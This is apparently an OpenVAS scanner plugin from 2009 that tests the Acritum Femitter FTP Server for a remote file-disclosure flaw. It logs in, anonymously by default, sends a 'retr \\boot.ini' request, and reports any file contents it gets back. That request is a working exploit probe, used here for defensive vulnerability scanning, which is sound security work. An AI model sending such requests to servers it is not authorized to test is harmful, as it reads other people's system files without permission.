###############################################################################
# OpenVAS Vulnerability Test
# $Id: femitter_ftp_34689.nasl 3198 2009-04-26 18:59:36Z mime $
#
# Acritum Femitter Server Remote File Disclosure Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Michael Meyer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
################################################################################

desc["english"] = "
  Overview:
 
   Acritum Femitter FTP Server is prone to a remote file-disclosure
   vulnerability because it fails to properly sanitize user-supplied
   input.

   An attacker can exploit this vulnerability to view local files in
   the context of the server process. This may aid in further attacks.

   Acritum Femitter Server 0.96 and 1.03 are affected; other versions
   may be vulnerable as well. 

  See also:
   http://www.securityfocus.com/bid/34689

  Risk factor : Medium";

if(description)
{
  script_id(100165);
  script_bugtraq_id(34689);
  script_version("1.0");
  script_name(english:"Acritum Femitter Server Remote File Disclosure Vulnerability");
  script_description(english:desc["english"]);
  script_summary(english:"Determine if Acritum Femitter FTP Server is vulnerable to remote file-disclosure");
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"Copyright (C) 2009 Michael Meyer");
  script_family(english:"FTP");
  script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
  script_require_ports("Services/ftp", 21);
  exit(0);
}

include("ftp_func.inc");

ftpPort = get_kb_item("Services/ftp");
if(!ftpPort){
  ftpPort = 21;
}

if(get_kb_item('ftp/'+port+'/broken'))exit(0);

if(!get_port_state(ftpPort)){
  exit(0);
}

soc1 = open_sock_tcp(ftpPort);
if(!soc1){
  exit(0);
}

domain = get_kb_item("Settings/third_party_domain");
if(isnull(domain)) {
 domain = this_host_name();;
}

user = get_kb_item("ftp/login");
pass = get_kb_item("ftp/password");

if(!user)user = "anonymous";
if(!pass)pass = string("openvas@", domain);;

login_details = ftp_log_in(socket:soc1, user:user, pass:pass);

if(login_details)
{
  ftpPort2 = ftp_get_pasv_port(socket:soc1);
  if(ftpPort2)
  {
    soc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));
    if(soc2)
    {
      send(socket:soc1, data:'retr \\boot.ini\r\n');
      result = ftp_recv_data(socket:soc2);
      close(soc2);
    }
  }
  
  if(result && egrep(pattern: "\[boot loader\]", string: result)) {
   info = string("Medium\n\nHere are the contents of the file 'boot.ini' that\nOpenVAS was able to read from the remote host:\n\n"); 
   info += result;
   info += string("\n");

   desc = ereg_replace(
    	string:desc["english"],
    	pattern:"Medium$",
    	replace:info
    );    

   security_warning(port:port,data:desc);
   ftp_close(socket:soc1);
   close(soc1);
   exit(0);
  }  

ftp_close(socket:soc1);
close(soc1);
exit(0);

}

exit(0);
